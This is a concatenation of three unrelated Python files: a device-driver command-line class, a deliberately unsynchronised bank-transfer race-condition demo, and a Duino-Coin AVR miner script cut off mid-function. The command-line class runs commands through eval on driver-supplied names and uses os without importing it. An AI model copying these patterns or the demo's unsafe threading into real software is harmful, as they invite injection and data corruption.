import sys
import time
import threading
from os import getpid
import psutil
# from .web import Webserver
from ..models import WebserverArgs
from ..core.driver import (Driver, DriverEvents)
from ..core.device_context import DeviceContext
from ..core.tunnel_web import WebServer
from ..core.tunnel_base import TunnelEvents
from ..framework import AppLogger
from ..framework.utils import resource
from ..framework.constants import APP_TYPE
from ..framework.context import APP_CONTEXT
class CommandLine:
'''Command line entry class
'''
options = None
_tunnel = None
_driver = None
webserver_running = False
supported_commands = []
input_string = None
current_command = None
def __init__(self, **kwargs):
self._build_options(**kwargs)
APP_CONTEXT.mode = APP_TYPE.CLI
# self.communication = 'uart'
# self.device_provider = None
# self.communicator = None
# self.webserver = Webserver(**kwargs)
def listen(self):
'''
Prepare components, initialize the application
'''
# prepare driver
threading.Thread(target=self._prepare_driver).start()
# prepage logger
self._prepare_logger()
def handle_discovered(self, device_provider):
device_context = DeviceContext(device_provider)
APP_CONTEXT.device_context = device_context
if self._tunnel:
self._tunnel.notify('discovered')
def handle_lost(self):
if self._tunnel:
self._tunnel.notify('lost')
def handle_upgrade_finished(self):
if self._tunnel:
self._tunnel.notify(
'continous', 'upgrade_complete', {'success': True})
def handle_upgrade_fail(self, code, message):
if self._tunnel:
self._tunnel.notify('continous', 'upgrade_complete', {
'success': False, 'code': code, 'message': message})
def handle_error(self, error, message):
if self._tunnel:
self._tunnel.notify('lost')
def handle_request(self, method, converted_method, parameters):
result = self._driver.execute(converted_method, parameters)
if self._tunnel:
self._tunnel.notify('invoke', method, result)
def handle_receive_continous_data(self, packet_type, data):
if self._tunnel:
self._tunnel.notify('continous', packet_type, data)
def _prepare_driver(self):
self._driver = Driver(self.options)
self._driver.on(DriverEvents.Discovered,
self.handle_discovered)
self._driver.on(DriverEvents.Lost,
self.handle_lost)
self._driver.on(DriverEvents.UpgradeFinished,
self.handle_upgrade_finished)
self._driver.on(DriverEvents.UpgradeFail,
self.handle_upgrade_fail)
self._driver.on(DriverEvents.Error,
self.handle_error)
self._driver.on(DriverEvents.Continous,
self.handle_receive_continous_data)
self._driver.detect()
self.setup_command_handler()
def _prepare_logger(self):
'''
Set default log handler: console logger, file logger
'''
executor_path = resource.get_executor_path()
log_level = 'info'
if self.options.debug:
log_level = 'debug'
console_log = self.options.console_log
APP_CONTEXT.set_logger(
AppLogger(
filename=os.path.join(executor_path, 'loggers', 'trace.log'),
gen_file=True,
level=log_level,
console_log=console_log
))
APP_CONTEXT.set_print_logger(
AppLogger(
filename=os.path.join(
executor_path, 'loggers', 'print_' + time.strftime('%Y%m%d_%H%M%S') + '.log'),
gen_file=True,
level=log_level
))
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self._driver.execute('get_command_lines')
while True:
token = input(">>")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
break
else:
self.help_handler()
self.exit_handler()
return True
def start_webserver(self):
'''
Start websocket server
'''
import tornado.ioloop
if sys.version_info[0] > 2:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = tornado.ioloop.IOLoop.current()
self._tunnel = WebServer(self.options, event_loop)
self._tunnel.on(TunnelEvents.Request, self.handle_request)
self._tunnel.setup()
def _build_options(self, **kwargs):
self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
def connect_handler(self):
'''
Connect to device, may no need it later
'''
print(self._driver.execute('get_device_info'))
def upgrade_handler(self):
'''upgrade command is used for firmware upgrade and followed by file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
# TODO: check device is idel
self._driver.execute('upgrade_framework', file_name)
return True
def record_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if APP_CONTEXT.device_context.runtime_status != 'LOGGING':
self._driver.execute('start_data_log')
return True
def stop_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if APP_CONTEXT.device_context.runtime_status == 'LOGGING':
self._driver.execute('stop_data_log')
if self.webserver_running:
self._tunnel.stop_ws_server()
self.webserver_running = False
return True
def get_handler(self):
'''
Get parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
if (input_args == 1):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if (i == len(input_params_properties)):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
param = self._driver.execute(
'get_param', {'paramId': select_param['paramId']})
print(param['data']['value'])
return True
def set_handler(self):
'''
Set parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
not_in_options = False
options = []
if input_args == 1:
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if input_args == 2:
if i == len(input_params_properties):
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
else:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
if select_param.__contains__('options'):
for item in select_param['options']:
if isinstance(item, dict):
options.append(int(item['key']))
else:
options.append(item)
if select_param['type'] == 'int64':
self.input_string[2] = int(self.input_string[2])
if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
not_in_options = True
if select_param['type'] == "int64" and\
self.input_string[2] not in options:
not_in_options = True
if not_in_options:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
conf = self._driver.execute('set_param', {
'paramId': select_param['paramId'],
'value': self.input_string[2]
})
# TODO: display a response message to user
return True
def save_handler(self):
'''
Save device configuration
'''
self._driver.execute('save_config')
return True
def server_start_handler(self):
'''
start a websocket server
'''
threading.Thread(target=self.start_webserver).start()
self.webserver_running = True
return True
def exit_handler(self):
'''
Exit current process
'''
# self.webserver.stop()
# self.webserver_running = False
pid = getpid()
process = psutil.Process(pid)
process.kill()
def run_handler(self):
'''used by customers
'''
return True
|
unsafe_bank.py
|
import datetime
import random
import time
from threading import Thread
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
from_account.balance -= amount
time.sleep(.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(
total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == '__main__':
main()
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.6.1)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
from random import choice
import select
import pip
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.61' # Version number
SOC_TIMEOUT = 45
PERIODIC_REPORT_TIME = 60
AVR_TIMEOUT = 3.1 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + '/langs.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + '/Miner_config.cfg')
lang = config['Duino-Coin-AVR-Miner']['language']
except Exception:
# If it fails, fallback to english
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
# Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(diff: int):
if int(diff) >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif int(diff) >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif int(diff) >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
def debug_output(text: str):
# Debug output
if debug == 'y':
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ 'DEBUG: '
+ str(text))
def title(title: str):
# Window title
if osname == 'nt':
# Windows systems
ossystem('title ' + title)
else:
# Most standard terminals
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
'sys0',
get_string('sigint_detected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('goodbye'),
'warning')
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
global AVR_TIMEOUT
global PERIODIC_REPORT_TIME
# Initial configuration section
if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
print(
Style.BRIGHT
+ get_string('basic_config_tool')
+ RESOURCES_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL
+ get_string('dont_have_account')
+ Fore.YELLOW
+ get_string('wallet')
+ Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ ' '
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET
+ Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL
+ Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
#if osname == 'nt' or osname == 'posix':
# donation_level = input(
# Style.RESET_ALL
# + Fore.YELLOW
# + get_string('ask_donation_level')
# + Fore.RESET
# + Style.BRIGHT)
# Check wheter donation_level is correct
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config['Duino-Coin-AVR-Miner'] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 3.1,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"
}
# Write data to file
with open(str(RESOURCES_DIR)
+ '/Miner_config.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
username = config['Duino-Coin-AVR-Miner']['username']
avrport = config['Duino-Coin-AVR-Miner']['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = config['Duino-Coin-AVR-Miner']['donate']
debug = config['Duino-Coin-AVR-Miner']['debug']
rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
SOC_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["soc_timeout"])
AVR_TIMEOUT = float(config["Duino-Coin-AVR-Miner"]["avr_timeout"])
discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
shuffle_ports = config["Duino-Coin-AVR-Miner"]["shuffle_ports"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-AVR-Miner"]["periodic_report"])
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string('banner')
+ Style.RESET_ALL
+ Fore.MAGENTA
+ ' (v'
+ str(MINER_VER)
+ ') '
+ Fore.RESET
+ '2019-2021')
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('avr_on_port')
+ Style.BRIGHT
+ Fore.YELLOW
+ ' '.join(avrport))
#if osname == 'nt' or osname == 'posix':
# print(
# Style.DIM
# + Fore.MAGENTA
# + ' ‖ '
# + Style.NORMAL
# + Fore.RESET
# + get_string('donation_level')
# + Style.BRIGHT
# + Fore.YELLOW
# + str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('algorithm')
+ Style.BRIGHT
+ Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('rig_identifier')
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ', '
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output('Discord rich presence initialized')
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details='Hashrate: ' + str(round(hashrate)) + ' H/s',
start=startTime,
state='Acc. shares: '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1]),
large_image='ducol',
large_text='Duino-Coin, '
+ 'a coin that can be mined with almost everything, '
+ 'including AVR boards',
buttons=[
{'label': 'Learn more',
'url': 'https://duinocoin.com'},
{'label': 'Discord Server',
'url': 'https://discord.gg/k48Ht5y'}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO 'standard'
# Usb/net/sys background
if message_type.startswith('net'):
background = Back.BLUE
elif message_type.startswith('usb'):
background = Back.MAGENTA
else:
background = Back.GREEN
# Text color
if state == 'success':
color = Fore.GREEN
elif state == 'warning':
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ background
+ ' '
+ message_type
+ ' '
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com, threadid):
global hashrate
start_time = time()
report_shares = 0
while True:
try:
while True:
try:
# Default AVR mining port
debug_output('Connecting to ' +
str(NODE_ADDRESS + ":" + str(NODE_PORT)))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if threadid == 0:
if float(server_version) <= float(MINER_VER):
pretty_print(
'net0',
get_string('connected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('connected_server')
+ str(server_version)
+ ")",
'success')
else:
pretty_print(
'sys0',
' Miner is outdated (v'
+ MINER_VER
+ ') -'
+ get_string('server_is_on_version')
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ get_string('update_warning'),
'warning')
sleep(10)
soc.send(bytes("MOTD", encoding="ascii"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(10)
pretty_print(
'sys'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_start')
+ Style.NORMAL
+ Fore.RESET
+ get_string('mining_algorithm')
+ str(com)
+ ')',
'success')
while True:
# Send job request
debug_output(com + ': requested job from the server')
soc.sendall(
bytes(
'JOB,'
+ str(username)
+ ',AVR',
encoding='ascii'))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(''.join(filter(str.isdigit, com)))
+ "Correct job received")
except:
pretty_print("usb"
+ str(''.join(filter(str.isdigit, com))),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
while True:
try:
ser.close()
except:
pass
try:
ser = Serial(com,
baudrate=int(BAUDRATE),
timeout=float(AVR_TIMEOUT))
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ ' (port connection err: '
+ str(e)
+ ')',
'error')
sleep(10)
while True:
retry_counter = 0
while True:
if retry_counter >= 3:
break
try:
debug_output(com + ': sending job to AVR')
ser.write(
bytes(
str(
job[0]
+ ',' + job[1]
+ ',' + job[2]
+ ','), encoding='ascii'))
debug_output(com + ': reading result from AVR')
result = ser.read_until(b'\n').decode().strip()
ser.flush()
if "\x00" in result or not result:
raise Exception("Empty data received")
debug_output(com + ': retrieved result: '
+ str(result)
+ ' len: '
+ str(len(result)))
result = result.split(',')
try:
if result[0] and result[1]:
break
except Exception as e:
debug_output(
com
+ ': retrying reading data: '
+ str(e))
retry_counter += 1
except Exception as e:
debug_output(
com
+ ': retrying sending data: '
+ str(e))
retry_counter += 1
try:
debug_output(
com
+ ': received result ('
+ str(result[0])
+ ')')
debug_output(
com
+ ': received time ('
+ str(result[1])
+ ')')
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
if computetime < 1:
computetime = str(
int(computetime * 1000)) + "ms"
else:
computetime = str(round(computetime, 2)) + "s"
# Calculate hashrate
hashrate_t = round(
int(result[0]) * 1000000 / int(result[1]), 2)
hashrate_mean.append(hashrate_t)
# Get average from the last hashrate measurements
hashrate = mean(hashrate_mean[-5:])
debug_output(
com +
': calculated hashrate (' +
str(hashrate_t) + ')'
+ ' (avg:' + str(hashrate) + ')')
try:
chipID = result[2]
debug_output(
com + ': chip ID: ' + str(result[2]))
""" Check if chipID got received, this is
of course just a fraction of what's
happening on the server with it """
if not chipID.startswith('DUCOID'):
raise Exception('Wrong chipID string')
except Exception:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
' Possible incorrect chip ID!'
+ Style.NORMAL
+ Fore.RESET
+ ' This can cause problems with the'
+ ' Kolka system',
'warning')
chipID = 'None'
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_avr_connection_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (error reading result from the board: '
+ str(e)
+ ', please check connection '
+ 'and port setting)',
'warning')
debug_output(
com + ': error splitting data: ' + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(result[0])
+ ','
+ str(hashrate_t)
+ ',Official AVR Miner v'
+ str(MINER_VER)
+ ','
+ str(rig_identifier)
+ ','
+ str(chipID),
encoding='ascii'))
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output(com + ': connection error: ' + str(e))
sleep(5)
break
while True:
try:
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip('\n')
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
debug_output(com + ': feedback: '
+ str(feedback)
+ ' with ping: '
+ str(ping))
break
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (err parsing response: '
+ str(e)
+ ')',
'error')
debug_output(com + ': error parsing response: '
+ str(e))
sleep(5)
break
diff = get_prefix(diff)
if feedback == 'GOOD':
# If result was correct
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.GREEN
+ ' ⛏'
+ get_string('accepted')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
elif feedback == 'BLOCK':
# If block was found
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.CYAN
+ ' ⛏'
+ get_string('block_found')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
else:
# If result was incorrect
shares[1] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.RED
+ ' ✗'
+ get_string('rejected')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
hashrate,
uptime)
start_time = time()
break
except Exception as e:
pretty_print(
'net0',
